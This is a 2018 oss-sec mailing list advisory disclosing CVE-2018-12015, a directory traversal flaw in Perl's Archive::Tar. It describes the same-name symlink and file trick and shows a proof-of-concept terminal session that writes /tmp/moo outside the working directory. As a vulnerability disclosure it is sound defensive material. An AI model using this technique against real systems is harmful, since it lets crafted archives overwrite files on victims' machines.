oss-sec mailing list archives

Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability

From: Salvatore Bonaccorso <carnil () debian org>
Date: Thu, 7 Jun 2018 20:41:25 +0200

Hi

The following dirctory traversal vulnerability was reporte to the
Debian bugtracker at https://bugs.debian.org/900834 , which got
assigned CVE-2018-12015 by MITRE (requested via the
http://cveform.mitre.org/):

By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.

I've attached proof of concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:

  $ tar -tvvf traversal.tar.gz
  lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
  -rw-r--r-- root/root         4 2018-06-05 18:55 moo

  $ pwd
  /home/jwilk

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'

  $ ls /tmp/moo
  /tmp/moo


The mentioned proof of concept tarball is attached to the Debian bug at
https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=900834;filename=traversal.tar.gz;msg=3
.

Regards,
Salvatore

Current thread:

Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability Salvatore Bonaccorso (Jun 07)